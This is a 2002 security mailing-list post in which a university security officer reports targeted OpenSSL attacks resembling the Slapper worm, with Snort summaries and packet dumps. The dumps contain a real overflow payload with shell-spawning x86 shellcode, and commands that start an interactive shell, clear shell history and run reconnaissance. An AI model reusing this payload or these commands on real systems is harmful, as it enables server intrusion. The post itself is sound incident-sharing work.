non worm ssl attacks

Russell Fulton r.fulton at auckland.ac.nz
Tue Sep 17 09:53:38 GMT 2002


HI,  we have just had 3 servers attacked via OpenSSL using very similar
exploits to the slapper worm.  There are however differences:

1/ there was no port 80 scan or probes (targets had clearly been
selected before hand)
2/ there were many more iterations of the basic attack (around 30)

None of the systems were compromised.

Here are the snortsnarf summary of the attack on one system:

Earliest: 17:37:20.489882 on 09/17/2002  (times are UTC +1200)
Latest: 17:39:13.367289 on 09/17/2002

3 different signatures are present for 211.224.129.96 as a source

    * 28 instances of OpenSSL worm attack
    * 28 instances of Apache chunked encoding exploit, uname -a
    * 31 instances of Apache chunked encoding exploit, AAAAA padding

snort packet dumps from one iteration:

[**] Apache chunked encoding exploit, AAAAA padding [**]
09/17-05:37:33.740719 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x21C
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12337
IpLen:20 DgmLen:526 DF
***AP*** Seq: 0xB9A41B14  Ack: 0xFC880B34  Win: 0x1DCE  TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261451 45779712 
81 D8 02 01 00 80 00 00 00 80 01 4E C4 44 22 F0  ...........N.D".
A2 3B 7B 70 A8 24 1D D2 62 DA 15 96 7A 16 55 33  .;{p.$..b...z.U3
D1 84 55 86 AA 1B 53 B0 E8 25 4B 4F 4A 01 D2 17  ..U...S..%KOJ...
E6 43 31 09 EC 04 74 80 04 14 22 D6 BD E9 BD 8D  .C1...t...".....
2D 91 AC 39 C6 15 32 38 25 BC 15 8A ED CE C1 A9  -..9..28%.......
D7 6B 92 02 E0 6A 28 69 E4 41 1F AB DD 46 46 CB  .k...j(i.A...FF.
A0 74 E8 5B C4 59 DC 9F B6 52 69 C6 A4 16 94 CC  .t.[.Y...Ri.....
13 FF C6 76 4F 3E A0 88 72 1A CE 11 AF 34 4D 45  ...vO>..r....4ME
8D 7E 2E F4 BC 00 EF C6 FB 63 44 5D 0E 0C 2F 34  .~.......cD]../4
2F 0B 48 2C 41 41 41 41 41 41 41 41 41 41 41 41  /.H,AAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 00 00 00 00 00 00 00 00 41 41 41 41  AAAA........AAAA
01 00 00 00 41 41 41 41 41 41 41 41 41 41 41 41  ....AAAAAAAAAAAA
8C D0 69 40 41 41 41 41 00 00 00 00 00 00 00 00  ..i at AAAA........
00 00 00 00 41 41 41 41 41 41 41 41 00 00 00 00  ....AAAAAAAA....
11 00 00 00 F0 37 3D 08 A0 11 1D 08 10 00 00 00  .....7=.........
10 00 00 00 EB 0A 90 90 90 90 90 90 90 90 90 90  ................
31 DB 89 E7 8D 77 10 89 77 04 8D 4F 20 89 4F 08  1....w..w..O .O.
B3 10 89 19 31 C9 B1 FF 89 0F 51 31 C0 B0 66 B3  ....1.....Q1..f.
07 89 F9 CD 80 59 31 DB 39 D8 75 0A 66 B8 CA A6  .....Y1.9.u.f...
66 39 46 02 74 02 E2 E0 89 CB 31 C9 B1 03 31 C0  f9F.t.....1...1.
B0 3F 49 CD 80 41 E2 F6 31 C9 F7 E1 51 5B B0 A4  .?I..A..1...Q[..
CD 80 31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89  ..1.Ph//shh/bin.
E3 50 53 89 E1 99 B0 0B CD 80                    .PS.......

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] OpenSSL worm attack [**]
09/17-05:37:35.403562 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x6F
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12340
IpLen:20 DgmLen:97 DF
***AP*** Seq: 0xB9A41D11  Ack: 0xFC880B6D  Win: 0x1DCE  TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261618 45779777 
54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F  TERM=xterm; expo
72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65  rt TERM=xterm; e
78 65 63 20 62 61 73 68 20 2D 69 0A 0A           xec bash -i..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] Apache chunked encoding exploit, uname -a [**]
09/17-05:37:35.403639 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x64
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12341
IpLen:20 DgmLen:86 DF
***AP**F Seq: 0xB9A41D3E  Ack: 0xFC880B6D  Win: 0x1DCE  TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261618 45779777 
75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 20  unset HISTFILE; 
75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B  uname -a; id; w;
0A 0A                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Looks to me as if someone has repackaged the exploits to use in a more
directed fashion.

-- 
Russell Fulton, Computer and Network Security Officer
The University of Auckland,  New Zealand

"It aint necessarily so"  - Gershwin



More information about the unisog mailing list